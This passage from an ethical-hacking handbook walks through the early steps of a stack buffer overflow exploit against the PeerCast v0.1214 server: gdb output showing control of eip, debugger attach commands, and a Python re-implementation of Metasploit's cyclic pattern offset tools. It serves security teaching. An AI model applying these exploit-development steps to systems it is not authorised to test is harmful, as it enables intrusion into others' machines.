..
[Switching to Thread 180236 (LWP 4526)]
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141
(gdb)
As you can see, we have a classic buffer overflow and have total control of eip. Now that
we have accomplished the first step of the exploit development process, let's move to the
next step.
Determine the Offset(s)
With control of eip, we need to find out exactly how many characters it took to cleanly
overwrite eip (and nothing more). The easiest way to do this is with Metasploit's pattern
tools.
First, let's start the PeerCast v0.1214 server and attach our debugger with the following
commands:
#./peercast &
[1] 10794
#netstat -pan |grep 7144
tcp 0 0 0.0.0.0:7144 0.0.0.0:* LISTEN 10794/peercast
Gray Hat Hacking: The Ethical Hacker's Handbook
164
As you can see, the process ID (PID) in our case was 10794; yours will be different. Now
we can attach to the process with gdb and tell gdb to follow all child processes:
#gdb -q
(gdb) set follow-fork-mode child
(gdb) attach 10794
---Output omitted for brevity---
Next we can use Metasploit to create a large pattern of characters and feed it to the
PeerCast server using the following perl command from within a Metasploit Framework
Cygshell.
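As an added example (not the book's or Metasploit's own code), here is the pattern-tool step in Python: pattern_create builds the same Aa0Aa1... sequence Metasploit uses, and pattern_offset turns the eip value gdb prints into the byte offset, undoing the x86 little-endian byte order that otherwise makes the lookup fail. The eip values used below are constructed for the example, not taken from the PeerCast session.

```python
"""Metasploit-style cyclic pattern generation and offset lookup.

Re-implements what pattern_create / pattern_offset do so the step in the
text ("how many bytes until eip is overwritten") can be worked through
offline. Added example; not the book's or Metasploit's code.
"""
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the Aa0Aa1...Zz9 pattern.

    Each 3-byte triplet (upper, lower, digit) is unique within the first
    26*26*10*3 = 20280 bytes, so any 4-byte window identifies one offset.
    """
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than %d bytes is not unique" % len(out))


def pattern_offset(eip: int, length: int = 20280) -> int:
    """Offset at which the 4 bytes now sitting in eip appear in the pattern.

    `eip` is the value as gdb prints it (e.g. 0x41414141). On x86 the
    register is loaded little-endian, so the bytes that were written to
    the stack are eip's bytes in reverse; struct.pack("<I") restores
    the on-the-wire order before searching.
    """
    needle = struct.pack("<I", eip)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("0x%08x is not a value from the pattern" % eip)
    return idx


if __name__ == "__main__":
    # Constructed value: what gdb would print for eip after the pattern
    # landed in the saved return address at offset 780.
    print(pattern_offset(0x42306142))  # 780
```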